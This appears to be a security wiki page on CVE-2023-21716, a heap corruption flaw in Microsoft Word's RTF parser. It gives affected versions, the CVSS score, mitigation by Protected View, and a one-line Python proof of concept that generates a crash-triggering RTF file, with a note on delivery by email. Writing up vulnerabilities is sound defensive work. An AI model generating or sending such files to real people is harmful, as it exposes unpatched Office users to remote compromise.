CVE-2023-21716 (Microsoft Word RCE)

PreviousForgot password of file ?NextSCCM | MECM

Last updated 1 year ago

Was this helpful?

CVE-2023-21716 (Microsoft Word RCE)

CNA: Microsoft Corporation (more like telemetry corporation)
Base Score: 9.8 CRITICAL
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Brief

It is a heap corruption vulnerability in Microsoft Word’s RTF parser that, if triggered, allows attackers to achieve remote code execution with the privileges of the victim.
The flaw does not require prior authentication: attackers can simply send a booby-trapped RTF file to the victim(s) via email.

Details

Affected products

Microsoft Office 365 (Insider Preview - 2211 Build 15831.20122 CTR)
Microsoft Office 2016 (Including Insider Slow - 1704 Build 8067.2032 CTR)
Microsoft Office 2013
Microsoft Office 2010
Microsoft Office 2007
Older versions may also be affected but were not tested. Furthermore, the technical details of this vulnerability have evolved over the years.

Mitigations

Microsoft Office 2010 and later use Protected View to limit damage caused by malicious documents procured from untrusted sources. Protected View is in effect when this vulnerability manifests and thus an additional sandbox escape vulnerability would be required to gain full privileges.

PoC

open("exploit.rtf", "wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rt''lch no crash??}\n}}\n").encode('utf-8'))

With email sent

PreviousForgot password of file ?NextSCCM | MECM

Last updated 1 year ago

Was this helpful?